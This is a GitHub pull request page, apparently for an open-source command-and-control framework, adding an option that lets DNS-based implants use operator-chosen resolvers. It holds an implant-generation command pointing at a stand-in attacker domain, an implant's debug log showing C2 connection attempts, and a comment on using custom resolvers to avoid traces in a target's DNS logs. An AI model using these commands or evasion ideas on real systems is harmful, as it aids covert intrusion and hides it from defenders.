Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Adding support for specifying DNS resolvers through advanced options #1235

Merged
merged 1 commit into from
May 15, 2023
Merged

Adding support for specifying DNS resolvers through advanced options #1235

merged 1 commit into from
May 15, 2023

Conversation

RafBishopFox
Copy link
Collaborator

Addresses #718 . Added an option to the advanced C2 options called resolvers that lets the operator specify resolvers to use instead of what are specified on the system. Using the new option would look something like this:

generate --dns my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9

Resolvers are separated with the plus symbol because we are using URL encoding. An example is below. I did not have a C2 server listening specifically to make sure it would failover to the second resolver.

2023/05/15 14:27:45 sliver.go:95: Hello my name is OFFICIAL_HIP
2023/05/15 14:27:45 limits.go:58: Limit checks completed
2023/05/15 14:27:45 sliver.go:113: Running in session mode
2023/05/15 14:27:45 session.go:64: Starting interactive session connection loop ...
2023/05/15 14:27:45 transports.go:41: Starting c2 url generator () ...
2023/05/15 14:27:45 transports.go:104: Return generator: (chan *url.URL)(0xc000046780)
2023/05/15 14:27:45 transports.go:92: Yield c2 uri = 'dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9'
2023/05/15 14:27:45 transports.go:92: Yield c2 uri = 'dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9'
2023/05/15 14:27:45 session.go:81: Next CC = dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9
2023/05/15 14:27:45 session.go:81: Next CC = dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9
2023/05/15 14:27:45 transports.go:92: Yield c2 uri = 'dns://my.evildomain.com.?resolvers=1.1.1.1+9.9.9.9'
2023/05/15 14:27:45 session.go:171: Attempting to connect via DNS via parent: my.evildomain.com.
2023/05/15 14:27:45 dnsclient.go:152: DNS client connecting to 'my.evildomain.com.' (timeout: 5s) ...
2023/05/15 14:27:45 dnsclient.go:746: [dns] forceResolvConf: ; forceResolvers: 1.1.1.1 9.9.9.9
2023/05/15 14:27:45 dnsclient.go:761: [dns] Using specified DNS resolvers: 1.1.1.1 9.9.9.9
2023/05/15 14:27:45 dnsclient.go:299: [dns] found resolvers: [1.1.1.1 9.9.9.9]
2023/05/15 14:27:45 crypto.go:199: TOTP Code: 96704390
2023/05/15 14:27:45 dnsclient.go:717: [dns] Fetching dns session id via 'baakbbnjkrqa.my.evildomain.com.' ...
2023/05/15 14:27:45 resolver-generic.go:92: [dns] 1.1.1.1:53->A record of baakbbnjkrqa.my.evildomain.com. ?
2023/05/15 14:27:47 resolver-generic.go:175: [dns] rtt->1.1.1.1:53 2.046869062s (err: <nil>)
2023/05/15 14:27:47 resolver-generic.go:100: [dns] error response status: 2
2023/05/15 14:27:47 resolver-generic.go:83: [dns] query error: invalid rcode (retry wait: 1s)
2023/05/15 14:27:48 resolver-generic.go:92: [dns] 1.1.1.1:53->A record of baakbbnjkrqa.my.evildomain.com. ?
2023/05/15 14:27:50 resolver-generic.go:175: [dns] rtt->1.1.1.1:53 2.019922597s (err: <nil>)
2023/05/15 14:27:50 resolver-generic.go:100: [dns] error response status: 2
2023/05/15 14:27:50 resolver-generic.go:83: [dns] query error: invalid rcode (retry wait: 1s)
2023/05/15 14:27:51 resolver-generic.go:92: [dns] 1.1.1.1:53->A record of baakbbnjkrqa.my.evildomain.com. ?
2023/05/15 14:27:53 resolver-generic.go:175: [dns] rtt->1.1.1.1:53 2.052029252s (err: <nil>)
2023/05/15 14:27:53 resolver-generic.go:100: [dns] error response status: 2
2023/05/15 14:27:53 resolver-generic.go:83: [dns] query error: invalid rcode (retry wait: 1s)
2023/05/15 14:27:54 resolver-generic.go:92: [dns] 9.9.9.9:53->A record of baakbbnjkrqa.my.evildomain.com. ?
2023/05/15 14:27:56 resolver-generic.go:175: [dns] rtt->9.9.9.9:53 1.51873538s (err: <nil>)
2023/05/15 14:27:56 resolver-generic.go:100: [dns] error response status: 2
2023/05/15 14:27:56 resolver-generic.go:83: [dns] query error: invalid rcode (retry wait: 1s)

If this PR is accepted, I will update the documentation in the Wiki. Hopefully this will make it easier to specify resolvers rather than URL-encoding a resolv.conf file. 😊

@RafBishopFox RafBishopFox requested a review from a team as a code owner May 15, 2023 19:23
@smeukinou
Copy link
Contributor

tbh, having a specific resolver (or even dns over http) would be useful to all implants network functions, that could avoid leaving traces in the "official" resolver logs if internet is available on the target.

@moloch--
Copy link
Member

tbh, having a specific resolver (or even dns over http) would be useful to all implants network functions, that could avoid leaving traces in the "official" resolver logs if internet is available on the target.

This will be a bit trickier to implement, we only include the DNS client code in the implant build if DNS C2 is enabled.

@moloch-- moloch-- merged commit 47f10d0 into master May 15, 2023
@RafBishopFox RafBishopFox deleted the dns-specification branch May 16, 2023 11:26
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@moloch-- moloch-- moloch-- approved these changes

Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@RafBishopFox @smeukinou @moloch--